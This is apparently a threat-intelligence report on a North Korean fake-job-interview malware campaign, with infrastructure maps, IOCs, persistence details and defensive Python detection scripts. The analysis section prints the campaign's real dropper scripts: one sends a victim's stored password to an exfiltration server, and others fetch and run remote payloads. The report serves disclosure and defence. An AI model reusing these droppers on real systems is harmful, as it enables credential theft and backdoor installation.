Two IOCs In, Five C2 Servers Out: Mapping DPRK's Contagious Interview Campaign From InvisibleFerret to a Kimsuky Crossover
Fake job interviews, ClickFix social engineering, NVIDIA masquerade persistence, and a Mach-O binary that links Lazarus to Kimsuky
Two IP addresses in a threat report. That's what we started with. By the time GHOST finished pulling threads, we had mapped 5 C2 servers across 4 hosting providers, 5 .cloud domains on a single Namecheap account, a deleted GitHub repository belonging to a fabricated Latin American woman, a serverless Fly.io endpoint disguised as an NVIDIA SDK, and a 4-stage cross-platform kill chain purpose-built to drain everything a developer holds dear -- SSH keys, cloud credentials, browser sessions, and cryptocurrency wallets.
This is the story of Contagious Interview, an active DPRK state-sponsored campaign where North Korean operatives pose as tech recruiters, lure developers into fake job interviews, and deploy a malware toolchain called BeaverTail and InvisibleFerret to compromise their machines across Windows, Linux, and macOS.
It is also a story about how a nation-state's obsession with NVIDIA masquerading and a few lazy OPSEC decisions turned their entire infrastructure into a single graph we could walk.
The Starting Point
The investigation began with two IPs flagged in an InvisibleFerret IOC report: 95[.]216[.]37[.]186 (Hetzner, Finland) and 95[.]164[.]17[.]24 (TheHosting/WorkTitans, Netherlands). Both were documented as command-and-control servers for InvisibleFerret, a compiled Python backdoor attributed to DPRK's Famous Chollima cluster -- a Lazarus Group sub-operation that has been targeting software developers since at least 2023.
Two IPs is a starting point, not a conclusion. We wanted the full picture: the infrastructure topology, the attack chain, the samples, the hosting decisions, and the operational fingerprints that tie it all together.
GHOST pulled ThreatFox entries, MalwareBazaar samples, WHOIS records, certificate transparency logs, Shodan services, and subnet scans. What came back was considerably more than two IPs.
Five Servers, Five Domains, One Campaign
The infrastructure spans four hosting providers and a serverless platform, each serving a distinct role in the kill chain:
| IP / Endpoint | Provider | Country | Role |
|---|---|---|---|
| 95[.]216[.]37[.]186 | Hetzner | Finland | Primary C2 (port 5000) + data exfiltration (port 3011) |
| 95[.]164[.]17[.]24 | TheHosting/WorkTitans | Netherlands | Secondary C2 (port 1224) |
| 45[.]59[.]163[.]23 | Tier.Net | US (Florida) | Windows C2 node (port 1244) -- SMB/RDP exposed, CVE-2020-0796 vulnerable |
| 172[.]86[.]93[.]139 | FranTech/BuyVM (PONYNET) | US (Wyoming) | Credential exfiltration endpoint (port 3000) |
| nvidiasdk[.]fly[.]dev | Fly.io | US | Serverless payload delivery |
The primary C2 at 95[.]216[.]37[.]186 runs Node.js/Express on port 5000. When we checked Shodan it was still live, but it now filters all incoming connections: an IP-allowlisted C2. The operator knows the server was burned and chose to lock it down rather than abandon it.
The Florida node at 45[.]59[.]163[.]23 is the most reckless piece of infrastructure in the set. It's a Windows box with SMB (445), RDP (3389), WinRM (5985), and FTP (21) all exposed to the internet. It's vulnerable to CVE-2020-0796 (SMBGhost). A nation-state running an unpatched Windows box with wide-open management ports as part of a credential theft operation is a particular flavor of irony.
Then there's the credential exfiltration server at 172[.]86[.]93[.]139 -- hosted on FranTech/BuyVM's PONYNET allocation. PONYNET is well-known in abuse reporting circles. If you're exfiltrating stolen passwords, choosing the one ASN that threat researchers check first is not ideal tradecraft.
Alongside the IPs, ThreatFox yielded five .cloud domains, all registered through Namecheap:
| Domain | Registered | Certificate |
|---|---|---|
| videodriverzone[.]cloud | 2025-02-05 | Sectigo RSA DV |
| driversnap[.]cloud | 2025-02-05 | Sectigo RSA DV |
| driverstream[.]cloud | 2025-02-05 | Sectigo RSA DV |
| videotechdrivers[.]cloud | 2025-02-28 | Sectigo RSA DV |
| camdriverstore[.]cloud | 2025-02-28 | Sectigo RSA DV |
Every domain follows a *driver* naming pattern. Every domain uses Sectigo DV certificates (paid, not free Let's Encrypt -- a deliberate choice for perceived legitimacy). Every domain operates its C2 on an api.* subdomain. And all five sit on the same Namecheap account.
Certificate transparency logs reveal the infrastructure was built in two waves. Wave 1 on February 5, 2025 registered three domains and issued base certs, then came back 19 days later to issue api.* subdomain certs. Wave 2 on February 28 registered two more domains and -- having learned from the first round -- issued base and subdomain certs simultaneously. The actor iterated on their deployment process between waves. They got more efficient, but they didn't get more careful.
All five domains are now dead (pendingDelete or clientHold). The infrastructure was active through at least early 2026.
The ClickFix Lure
The attack begins with social engineering. North Korean operatives -- using stolen or fabricated identities -- contact software developers through LinkedIn, Telegram, and Discord, posing as recruiters for legitimate tech companies. The pitch: a job interview that includes a technical coding challenge.
To participate, the developer is told to run a setup command to "fix their camera" or "clean their caches" before the video call. This is the ClickFix technique -- a social engineering pattern where the attacker provides a shell command that the victim executes voluntarily, believing it's a prerequisite for a legitimate application.
What the victim actually runs is a dropper. And from there, the chain forks depending on the operating system.
Four Stages to Total Compromise
We recovered and analyzed 7 distinct malware samples from MalwareBazaar, spanning shell scripts, VBScript loaders, obfuscated JavaScript, and compiled Python binaries. Together, they reveal a 4-stage kill chain that works across all three major operating systems.
Stage 1: The Preinstall Script
```bash
#!/usr/bin/env bash
source ~/.myvars
bpaswor=$(echo -n $MY_PASWOR | base64)
curl -X POST -H "Content-Type: text/plain" --data $bpaswor http://172.86.93.139:3000/pawr/ &
curl -sk -A 206 -o /var/tmp/downx64.sh https://raw.githubusercontent.com/RominaMabelRamirez/dify/refs/heads/bai/api/downx64.sh
echo $MY_PASWOR | sudo -S chmod +x /var/tmp/downx64.sh
echo $MY_PASWOR | sudo -S sh /var/tmp/downx64.sh &
```
The first thing this script does -- before downloading any malware -- is steal the victim's password. During the social engineering phase, the target was instructed to save their system password in a file called ~/.myvars ("for the interview tool to work"). The script sources that file, base64-encodes the password, and POSTs it to the FranTech/BuyVM credential exfiltration server at 172[.]86[.]93[.]139:3000/pawr/.
The password theft fires asynchronously (&) while the rest of the dropper chain proceeds in parallel. They get the credentials regardless of whether the later stages succeed.
Then it downloads the Stage 2 script from GitHub -- not from their own infrastructure, but from a fork of a legitimate open-source project.
The GitHub Persona
The payload staging repository was github[.]com/RominaMabelRamirez/dify, branch bai/api. "Dify" is a real open-source LLM app development platform (dify.ai). The DPRK actors forked it and embedded their payloads in the api/ directory -- a location that would look unremarkable in a legitimate Dify fork.
"RominaMabelRamirez" is a fabricated Latin American female identity. DPRK actors consistently create personas whose demographics don't match their own. The username format -- FirstMiddleLast with no spaces or separators -- is a known pattern across multiple Contagious Interview waves. GitHub has since deleted the repository.
Stage 2: The Downloader
```bash
#!/usr/bin/env bash
source ~/.myvars
mkdir -p ~/.n3
curl -k -A 205 -o /var/tmp/x64nvidia https://raw.githubusercontent.com/RominaMabelRamirez/dify/refs/heads/bai/api/x64nvidia
echo $MY_PASWOR | sudo -S chmod +x /var/tmp/x64nvidia
echo $MY_PASWOR | sudo -S /var/tmp/x64nvidia &
curl -k -A 207 -o ~/.n3/payuniversal2 https://raw.githubusercontent.com/RominaMabelRamirez/dify/refs/heads/bai/api/payuniversal2
```
Stage 2 downloads two payloads: x64nvidia (the primary BeaverTail binary) and payuniversal2 (a backup). It creates a hidden directory ~/.n3/ for staging, then enters a polling loop checking for ~/.npc -- a Python payload presumably dropped by the JavaScript stage. If the Python payload appears, it runs that; otherwise, it falls back to the compiled binary.
The redundancy is deliberate. Multiple delivery paths ensure the backdoor lands even if one stage fails.
The Numeric User-Agent Fingerprint
Every download request in the dropper chain uses a numeric-only User-Agent string: 205, 206, 207, 209. Not a browser string. Not a curl default. Just a bare integer.
These are payload selectors -- the C2 server can use the User-Agent to determine which stage of which infection chain is requesting what payload. But they're also a unique operational fingerprint. Any HTTP request with a purely numeric 3-digit User-Agent is inherently suspicious, and this pattern is specific enough to serve as a high-fidelity campaign marker.
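The two markers above (a bare three-digit User-Agent and a connection to one of the documented C2 or exfiltration endpoints) are easy to turn into a log triage rule. The following is an added example written for this article, not tooling from the report or from GHOST; the log format and the six sample lines are constructed, while the host:port pairs and User-Agent values come from the report's IOC list.

```python
import re
from typing import Dict, List

# Constructed proxy log lines (not real traffic). Format, one record per line:
#   src_ip dst_host:dst_port method path "user_agent"
SAMPLE_LOG = """\
10.0.0.14 raw.githubusercontent.com:443 GET /RominaMabelRamirez/dify/refs/heads/bai/api/downx64.sh "206"
10.0.0.14 172.86.93.139:3000 POST /pawr/ "curl/8.4.0"
10.0.0.21 nvidiasdk.fly.dev:443 GET /nvs "209"
10.0.0.21 registry.npmjs.org:443 GET /express "npm/10.2.4 node/v20.19.0"
10.0.0.33 example.com:443 GET / "Mozilla/5.0 (X11; Linux x86_64) Firefox/128.0"
10.0.0.33 95.216.37.186:5000 GET /client/1/abc "Mozilla/5.0"
"""

# Campaign marker 1: a User-Agent that is nothing but a 3-digit integer (205, 206, 207, 209)
NUMERIC_UA = re.compile(r"^\d{3}$")

# Campaign marker 2: C2 / exfiltration endpoints listed in the report (host:port)
IOC_ENDPOINTS = {
    "95.216.37.186:5000",   # primary C2
    "95.216.37.186:3011",   # data exfiltration
    "95.164.17.24:1224",    # secondary C2
    "45.59.163.23:1244",    # Windows C2 node
    "172.86.93.139:3000",   # credential exfiltration (/pawr/)
    "nvidiasdk.fly.dev:443",  # serverless payload delivery
}

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)"$')


def parse_line(line: str):
    """Parse one constructed-format log line; return None for lines that do not fit."""
    m = LINE_RE.match(line)
    if not m:
        return None
    src, dst, method, path, ua = m.groups()
    return {"src": src, "dst": dst, "method": method, "path": path, "ua": ua}


def triage(log_text: str) -> List[Dict]:
    """Return every record that trips at least one campaign marker, with the reasons."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = []
        if NUMERIC_UA.match(rec["ua"]):
            reasons.append(f"numeric-only User-Agent {rec['ua']} (dropper payload selector)")
        if rec["dst"] in IOC_ENDPOINTS:
            reasons.append(f"known C2/exfil endpoint {rec['dst']}")
        if reasons:
            hits.append({**rec, "reasons": reasons})
    return hits


def affected_hosts(hits: List[Dict]) -> List[str]:
    """Distinct internal source addresses that need follow-up, sorted."""
    return sorted({h["src"] for h in hits})


if __name__ == "__main__":
    for h in triage(SAMPLE_LOG):
        print(h["src"], "->", h["dst"], "|", "; ".join(h["reasons"]))
    print("hosts to investigate:", affected_hosts(triage(SAMPLE_LOG)))
```

The numeric User-Agent rule is the more durable of the two: IPs and domains in this set are already cycling, but the dropper scripts' bare-integer User-Agents survive infrastructure refreshes as long as the actor keeps reusing the same download scripts.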
The Alternative Path: NVM and Fly.io
A parallel infection chain skips GitHub entirely and uses the Fly.io serverless platform:
```bash
#!/usr/bin/env bash
wget -qO- https://raw.githubusercontent.com/nvm-sh/nvm/v0.40.2/install.sh | bash
\. "$HOME/.nvm/nvm.sh"
nvm install 20.19.0
nvm use 20.19.0
wget --no-check-certificate --user-agent="209" -O ~/.linvidia https://nvidiasdk.fly.dev/nvs
node ~/.linvidia 2>&1 &
```
This installs NVM from the legitimate nvm-sh repository (not compromised), downloads Node.js 20.19.0, then fetches an obfuscated JavaScript payload from nvidiasdk[.]fly[.]dev/nvs and runs it with Node. The specificity of the Node version (20.19.0) suggests the payload depends on particular runtime features.
The use of Fly.io for payload delivery is notable. Serverless platforms provide ephemeral infrastructure that's difficult to blocklist at the IP level -- the payload is served from Fly.io's shared infrastructure alongside thousands of legitimate applications. The nvidiasdk[.]fly[.]dev subdomain is now dead, but while it was live, it was effectively free C2 infrastructure with built-in CDN and TLS.
Stage 3: BeaverTail and InvisibleFerret
The 92KB JavaScript payload (be258c5f831f.js) is heavily obfuscated across multiple layers: hex-encoded variable names, array shuffling with parseInt validation, control flow flattening, and anti-debugging checks. The entire payload is wrapped as a JSON "cookie" value designed to be eval'd by the Node.js runtime.
When deobfuscated, BeaverTail downloads and executes InvisibleFerret -- a compiled Python backdoor available as both an 8.8MB ELF (Linux) and an 8.5MB PE (Windows). InvisibleFerret connects to the primary C2 at 95[.]216[.]37[.]186:5000 for commands and 95[.]216[.]37[.]186:3011 for data exfiltration, with 95[.]164[.]17[.]24:1224 as a secondary C2.
What InvisibleFerret steals is a developer's entire working life:
- SSH keys: ~/.ssh/* -- instant access to every server the developer can reach
- AWS credentials: ~/.aws/credentials, ~/.aws/config
- Azure credentials
- GCP credentials: ~/.config/gcloud/*
- Environment files: .env, .env.local, .env.production -- database passwords, API keys, secrets
- Browser data: login credentials, cookies, history, bookmarks, and extensions from Chrome, Brave, Opera, Edge, and Yandex
- Cryptocurrency wallets
This is not a spray-and-pray infostealer. It is a targeted exfiltration toolkit designed for developers who have sudo access on production servers and admin credentials for cloud platforms. One compromised developer at a tech company gives the DPRK access to the entire cloud infrastructure.
The Windows Path
On Windows, the delivery mechanism uses a VBScript dropper (update.vbs) that extracts a password-protected archive (p8.zi, password: ppp) using a copy of 7-Zip that has been renamed to .vscode\argv.exe. The .vscode directory name provides a legitimacy veneer -- it looks like a VS Code component. The extracted payload is nvidiasdk.exe, the Windows variant of InvisibleFerret.
Persistence on Windows uses the registry key HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NvidiaDriverUpdate. On macOS, it drops a LaunchAgent at ~/Library/LaunchAgents/com.avatar.update.wake.plist. On Linux, it creates .desktop files in ~/.config/autostart/.
The NVIDIA Masquerade
The NVIDIA branding runs through the entire campaign like a thread. The domains reference "video drivers." The registry persistence key is NvidiaDriverUpdate. The binaries are named nvidiasdk.exe, x64nvidia, and .linvidia. The encrypted archive is NVIDIA.zip. The Fly.io endpoint is nvidiasdk.fly.dev.
This is not coincidence -- it's calculated. NVIDIA drivers are installed on the majority of developer workstations. A process named NvidiaDriverUpdate in the Run key won't trigger a second glance from most users or even most endpoint detection tools. But using the same masquerade across the entire campaign -- domains, filenames, persistence, infrastructure -- means that once you identify the NVIDIA theme in one artifact, you can pattern-match across everything else.
OPSEC Failures
For a nation-state operation, the operational security is uneven. The multi-stage delivery chain, compiled Python payloads, and JavaScript obfuscation reflect professional tradecraft. But the infrastructure management tells a different story.
The Namecheap problem. All five .cloud domains are registered through the same registrar account. This means that once any single domain is identified as malicious, a registrar-level pivot reveals the entire domain set. Five C2 domains for five dollars' worth of OPSEC improvement -- separate registrar accounts -- and they didn't bother.
The naming pattern. Every domain contains "driver": videodriverzone, videotechdrivers, driversnap, camdriverstore, driverstream. Pattern-based detection rules could catch future domain registrations in this campaign with a single regex.
The certificate timeline. Two waves of Sectigo DV cert issuance, 23 days apart, reveal the exact infrastructure build schedule. Wave 1 required a return visit for subdomain certs; Wave 2 consolidated the process. The actor's operational learning curve is visible in the certificate transparency logs.
The numeric User-Agents. Using 3-digit integers as HTTP User-Agent strings is operationally unique. It makes the dropper traffic trivially distinguishable from any legitimate HTTP client.
FranTech/BuyVM for credential exfiltration. PONYNET is one of the most abuse-reported ASNs on the internet. Hosting your credential receiver there is the network equivalent of running a stolen goods operation out of a police station parking lot.
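The naming-pattern and registrar observations above translate directly into a registration-feed watch: match the "driver" token under .cloud and group the hits by registrar and registration date so that a wave shows up as a cluster. The code below is an added example for this article, not part of the report or of GHOST; the five .cloud domains and their dates come from the report, the registrar field is used as a stand-in for the registrar-account pivot the text describes, and the two non-matching rows are constructed noise.

```python
import re
from collections import defaultdict
from datetime import date
from typing import List, Tuple

# Constructed newly-registered-domains feed: (domain, registrar, registration_date).
# The .cloud rows are the campaign domains from the report; the last two rows are made-up benign entries.
REGISTRATIONS = [
    ("videodriverzone.cloud", "Namecheap", date(2025, 2, 5)),
    ("driversnap.cloud", "Namecheap", date(2025, 2, 5)),
    ("driverstream.cloud", "Namecheap", date(2025, 2, 5)),
    ("videotechdrivers.cloud", "Namecheap", date(2025, 2, 28)),
    ("camdriverstore.cloud", "Namecheap", date(2025, 2, 28)),
    ("taxidriverapp.example", "ExampleRegistrar", date(2025, 2, 5)),   # has "driver" but not .cloud
    ("weather-today.cloud", "Namecheap", date(2025, 2, 6)),            # .cloud but no "driver"
]

# The single regex the OPSEC section alludes to: "driver" anywhere in the name, .cloud TLD.
# Dots are allowed so CT-log entries such as api.<domain>.cloud match too.
DRIVER_CLOUD = re.compile(r"^(?=.*driver)[a-z0-9.-]+\.cloud$")


def match_driver_cloud(domains: List[str]) -> List[str]:
    """Return the domains (or CT-log hostnames) that fit the campaign naming pattern."""
    return [d for d in domains if DRIVER_CLOUD.match(d.lower())]


def waves(registrations) -> List[Tuple[str, date, List[str]]]:
    """Cluster matching registrations by (registrar, registration date), oldest first.

    Each cluster corresponds to one build wave; a second cluster under the same
    registrar is the registrar-level pivot the report describes."""
    groups = defaultdict(list)
    for domain, registrar, reg_date in registrations:
        if DRIVER_CLOUD.match(domain.lower()):
            groups[(registrar, reg_date)].append(domain)
    ordered = sorted(groups.items(), key=lambda kv: kv[0][1])
    return [(registrar, reg_date, sorted(doms)) for (registrar, reg_date), doms in ordered]


if __name__ == "__main__":
    for registrar, reg_date, doms in waves(REGISTRATIONS):
        print(f"{reg_date} via {registrar}: {len(doms)} domain(s) -> {', '.join(doms)}")
```

Run against a real registration feed the regex will of course also catch legitimate driver-download sites, so treat a hit as a pivot trigger (check registrar, certificate issuer, and whether an api.* subdomain appears) rather than as a verdict on its own.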
The Kimsuky Connection
Among the samples we recovered from MalwareBazaar, one stands out: chaotic_capybara, a 52KB Mach-O binary (SHA256: 469fd8a280e89a...). It's tagged with both ContagiousInterview (Lazarus/Famous Chollima) and Kimsuky/VelvetChollima.
Lazarus and Kimsuky are traditionally considered separate DPRK cyber units with different mandates -- Lazarus focuses on financial operations, Kimsuky on espionage. A sample carrying attribution markers for both suggests either tool sharing between units, a shared development pipeline, or operational convergence. Given the DPRK's centralized cyber command structure, the most likely explanation is that both units draw from a common tooling repository, with individual operators customizing payloads for their specific missions.
This also connects to a broader pattern we've been tracking. Just yesterday, we confirmed the axios BlueNoroff attack -- another DPRK-attributed campaign from a different Lazarus sub-unit. BlueNoroff, Famous Chollima, and now potentially Kimsuky -- all operating under the same DPRK umbrella, all targeting developers and financial infrastructure, all active simultaneously. The DPRK's cyber apparatus is not a single team. It's a constellation of units running parallel operations with overlapping tools and shared infrastructure patterns.
Campaign Timeline
| Date | Event |
|---|---|
| 2025-01-23 | First InvisibleFerret JS sample appears on MalwareBazaar |
| 2025-02-05 | Wave 1: Three .cloud domains registered, base certs issued |
| 2025-02-24 | Wave 1: api.* subdomain certs issued |
| 2025-02-28 | Wave 2: Two more .cloud domains registered, all certs issued same day |
| 2025-03-05 | .cloud domains first reported to ThreatFox (reporter: lontze7) |
| 2025-03-24 | chaotic_capybara (Kimsuky crossover sample) first seen |
| 2025-04-16 | Tier.Net C2 (45[.]59[.]163[.]23:1244) reported to ThreatFox |
| 2025-04-22 | newbeaver.py sample uploaded to MalwareBazaar |
| 2025-09-11 | Major sample batch uploaded (nvidiasdk.exe, x64nvidia, all dropper scripts) |
| 2025-09-19 | NVIDIA.zip and full campaign archive uploaded |
| 2026-02-28 | Tier.Net C2 last seen active |
| 2026-03-02 | .cloud C2 domains last active on ThreatFox |
| 2026-03-19 | videodriverzone.cloud enters pendingDelete |
| 2026-03-31 | This investigation -- primary C2 now filtered, infrastructure transitioning |
The campaign has been running for over a year. Infrastructure is cycling -- domains are dying, the primary C2 is locking down -- but the operation is not over. The tooling is mature, the social engineering playbook is proven, and the actor has demonstrated the ability to stand up new infrastructure in waves.
Indicators of Compromise
Network IOCs
C2 IP Addresses:
- 95[.]216[.]37[.]186:5000 -- Primary C2 (Node.js/Express)
- 95[.]216[.]37[.]186:3011 -- Data exfiltration
- 95[.]164[.]17[.]24:1224 -- Secondary C2
- 45[.]59[.]163[.]23:1244 -- ThreatFox-documented C2
- 172[.]86[.]93[.]139:3000 -- Credential exfiltration (/pawr/ endpoint)
C2 Domains:
- api[.]videodriverzone[.]cloud
- api[.]videotechdrivers[.]cloud
- api[.]driversnap[.]cloud
- api[.]camdriverstore[.]cloud
- api[.]driverstream[.]cloud
- nvidiasdk[.]fly[.]dev
Payload Staging:
- hxxps://raw[.]githubusercontent[.]com/RominaMabelRamirez/dify/refs/heads/bai/api/* (deleted)
- hxxps://nvidiasdk[.]fly[.]dev/nvs
User-Agent Campaign Markers:
- 205, 206, 207, 209 (numeric-only User-Agent strings)
Malware Samples (SHA256)
| Hash | File | Type |
|---|---|---|
| 699cd6c292b8a5... | InvisibleFerret Linux | ELF (8.8 MB) |
| 1c8c1a693209c3... | InvisibleFerret Windows | PE (8.5 MB) |
| bf7a54cf4ded7a... | be258c5f831f.js | Obfuscated JS (92 KB) |
| c5474d5f9e9888... | newbeaver.py.zip | Python backdoor |
| 9b80897b72f355... | Campaign archive | ZIP |
| fa628b8575564d... | NVIDIA.zip | Dropper archive |
| 25c9fc5c5564a7... | x64nvidia | Mach-O (BeaverTail) |
| e79b827b3cc29e... | nvidiasdk.exe | PE (BeaverTail) |
| 17891f7db5a633... | nvidia.tar.gz | BeaverTail archive |
| 6a16b1ef16e999... | update.vbs | VBScript dropper |
| 247fdba5fbfd07... | preinstall | Shell dropper |
| e224a1db42ae21... | clickfix_second_stage | Shell dropper |
| 9bc46c59e734b2... | clickfix_first_stage | Shell dropper |
| 65665c3faba4fb... | downx64.sh | Shell dropper |
| 469fd8a280e89a... | chaotic_capybara | Mach-O (Kimsuky crossover) |
Host Indicators
Persistence:
- Registry: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NvidiaDriverUpdate
- macOS: ~/Library/LaunchAgents/com.avatar.update.wake.plist
- Linux: ~/.config/autostart/*.desktop
- Windows Startup: %APPDATA%\...\Startup\queue.bat
File System Artifacts:
- ~/.myvars -- password storage (social engineering artifact)
- ~/.npc -- Python payload marker
- ~/.linvidia -- obfuscated JS payload
- ~/.n3/payuniversal2 -- backup binary
- /var/tmp/x64nvidia -- BeaverTail binary (Linux)
- /var/tmp/downx64.sh -- dropper script
- %TEMP%\nvidiasdk\.vscode\argv.exe -- renamed 7-Zip
- %TEMP%\nvidiasdk\p8.zi -- encrypted archive (password: ppp)
- %TEMP%\nvidiasdk\nvidiasdk.exe -- InvisibleFerret PE
Credential Targets:
- ~/.ssh/*
- ~/.aws/credentials, ~/.aws/config
- ~/.config/gcloud/*
- .env, .env.local, .env.production
- Browser stores: Chrome, Brave, Opera, Edge, Yandex
Takeaways
For developers: If someone contacts you about a job opportunity and asks you to run a terminal command to "fix your camera" or "set up the interview environment" -- stop. No legitimate recruiter will ever ask you to execute shell commands. If they ask you to save your password in a file, that is not a red flag. That is the entire red flag factory.
For security teams: Hunt for the NvidiaDriverUpdate registry key, the com.avatar.update.wake.plist LaunchAgent, and anomalous .desktop files in autostart directories. Check for ~/.myvars, ~/.npc, and ~/.linvidia across developer workstations. Any outbound connections to non-standard ports (5000, 3011, 1224, 1244, 3000) from developer machines warrant investigation. Numeric-only User-Agent strings in HTTP logs are near-certain indicators of this campaign.
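A hunt for the host artifacts listed above can be scripted against a fleet of Linux and macOS developer workstations. The script below is an added example for this article, not part of the report or of GHOST; it covers the POSIX paths the report names (the Windows Run key and Startup folder are out of scope here), takes the home directory as a parameter so it can be run over mounted images or a test tree, and ships with a constructed throwaway home directory so it can be tried offline. The Exec= heuristic for autostart entries is this example's own choice.

```python
import tempfile
from pathlib import Path
from typing import List, Tuple

# Artifact paths from the report, relative to the user's home directory
FILE_ARTIFACTS = [
    ".myvars",                                            # saved password (social engineering artifact)
    ".npc",                                               # Python payload marker
    ".linvidia",                                          # obfuscated JS payload
    ".n3/payuniversal2",                                  # backup binary
    "Library/LaunchAgents/com.avatar.update.wake.plist",  # macOS persistence
]
# Shared staging paths from the report (absolute, outside the home directory)
ABSOLUTE_ARTIFACTS = ["/var/tmp/x64nvidia", "/var/tmp/downx64.sh"]
AUTOSTART_DIR = ".config/autostart"
# Heuristic (this example's own): an autostart Exec= line pointing at campaign staging locations
SUSPICIOUS_EXEC_TOKENS = ("/var/tmp/", "/.n3/", ".linvidia", "x64nvidia", ".npc")


def suspicious_exec(line: str) -> bool:
    low = line.lower()
    return any(tok in low for tok in SUSPICIOUS_EXEC_TOKENS)


def hunt_home(home, check_absolute: bool = True) -> List[Tuple[str, str]]:
    """Return (path, reason) pairs for every campaign artifact found under `home`."""
    home = Path(home)
    findings = []
    for rel in FILE_ARTIFACTS:
        p = home / rel
        if p.exists():
            findings.append((str(p), "campaign artifact path"))
    if check_absolute:
        for a in ABSOLUTE_ARTIFACTS:
            if Path(a).exists():
                findings.append((a, "campaign staging path"))
    autostart = home / AUTOSTART_DIR
    if autostart.is_dir():
        for entry in sorted(autostart.glob("*.desktop")):
            try:
                text = entry.read_text(errors="replace")
            except OSError:
                continue
            exec_lines = [ln for ln in text.splitlines() if ln.startswith("Exec=")]
            if any(suspicious_exec(ln) for ln in exec_lines):
                findings.append((str(entry), "autostart entry launching campaign artifact"))
    return findings


def build_demo_home() -> Path:
    """Create a constructed throwaway home directory seeded with look-alike artifacts (demo only)."""
    home = Path(tempfile.mkdtemp(prefix="ci-hunt-demo-"))
    (home / ".myvars").write_text("MY_PASWOR=not-a-real-password\n")
    (home / ".linvidia").write_text("// placeholder standing in for the obfuscated JS\n")
    auto = home / ".config" / "autostart"
    auto.mkdir(parents=True)
    (auto / "nvidia-update.desktop").write_text(
        "[Desktop Entry]\nType=Application\nName=NVIDIA Driver Update\nExec=/var/tmp/x64nvidia\n")
    (auto / "nm-applet.desktop").write_text(
        "[Desktop Entry]\nType=Application\nName=Network\nExec=/usr/bin/nm-applet\n")
    return home


if __name__ == "__main__":
    demo = build_demo_home()
    for path, reason in hunt_home(demo, check_absolute=False):
        print(f"{reason}: {path}")
```

Point hunt_home at each real home directory (with check_absolute left on) to run it for real; a hit on ~/.myvars alone is worth an immediate credential rotation, since the report shows the password is exfiltrated before any payload is fetched.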
For the threat intelligence community: The Contagious Interview campaign has been running for over a year with incremental infrastructure refreshes. The tooling is cross-platform, the social engineering is proven, and the DPRK is running multiple parallel developer-targeting operations (Contagious Interview, BlueNoroff axios attack) simultaneously. The crossover between Lazarus and Kimsuky tooling visible in the chaotic_capybara sample suggests these operations may be more interconnected than traditional unit-based attribution models assume.
We started with two IPs from a public report. We ended with a complete infrastructure map, a full attack chain, 15 malware samples, and evidence of cross-unit DPRK tool sharing. The campaign domains are dying, but the operators are not done. They'll register new domains, stand up new servers, and send new LinkedIn messages. The playbook works too well to abandon.
The next time a recruiter reaches out with an opportunity that seems too good to be true, and the interview process requires you to run something in your terminal -- remember that the person on the other end might be working for a government that funds nuclear weapons programs with stolen cryptocurrency. And they want your ~/.ssh directory.
This investigation was conducted by Breakglass Intelligence's autonomous GHOST system, starting from two IOC IPs and expanding through ThreatFox, MalwareBazaar, certificate transparency, WHOIS, and Shodan pivots. All evidence was collected via passive and semi-passive methods. Abuse reports have been drafted for all identified hosting providers.
Breakglass Intelligence | March 31, 2026